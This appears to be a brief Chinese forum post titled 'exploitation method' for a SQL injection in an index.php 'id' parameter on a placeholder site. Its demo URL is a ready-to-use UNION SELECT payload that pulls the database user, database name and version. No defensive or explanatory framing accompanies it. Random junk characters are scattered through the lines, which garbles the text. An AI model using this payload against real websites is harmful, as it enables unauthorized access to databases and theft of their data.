利用方法:
+ J6 @% Y" U9 u( T6 D/ b http://www.xxx.com/index.php?id=[SQL]7 ~& k5 X+ ?7 i" @2 v
Demo:
( Y$ c5 T% }" H! t* c1 V http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |